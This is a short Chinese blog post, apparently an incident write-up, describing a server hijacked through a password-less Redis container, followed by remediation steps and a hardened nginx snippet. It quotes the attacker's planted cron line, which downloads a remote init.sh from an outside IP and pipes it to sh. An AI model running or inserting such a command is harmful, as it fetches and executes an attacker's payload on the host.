2025-05-06
运维
00
请注意,本文编写于 37 天前,最后修改于 22 天前,其中某些信息可能已经过时。

目录

发现
攻击方式
解决方案
1.首先进行数据备份
2.重装系统
3.变更密码
4.关闭不必要端口
5.更改nginx配置

发现

博客部署完成第二天,发现博客主页已经不能正常访问,且服务端口代理错误。发现几个异常IP的访问,估计自己的服务器被当成肉鸡了。

攻击方式

之前遗留隐患,通过 docker 构建 redis 服务时,并未创建密码,导致攻击者通过未授权方式进行在 redis 中留下定时执行脚本。

bash
*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh

解决方案

1.首先进行数据备份

好在自己的数据没有重要的,不然就完了。将自己的博客系统的配置信息进行备份。

2.重装系统

因为不知道服务器攻击存在隐患在哪,直接选择将系统进行重装。避免其他东西被连累。

3.变更密码

已经被攻击了,估计自己的密码已经泄漏,重置登录密码 ,服务配置密码,中间件密码

4.关闭不必要端口

只开放需要使用的端口,不使用的端口进行关闭

5.更改nginx配置

对nginx进行简单安全配置,减少提供可被攻击的路子

nginx
http { server_tokens off; add_header Strict-Transport-Security "max-age=31536000; includeSubDomains" always; client_max_body_size 10M; add_header X-Frame-Options SAMEORIGIN; }

本文作者:Nongsc

本文链接:

版权声明:本博客所有文章除特别声明外,均采用 BY-NC-SA 许可协议。转载请注明出处!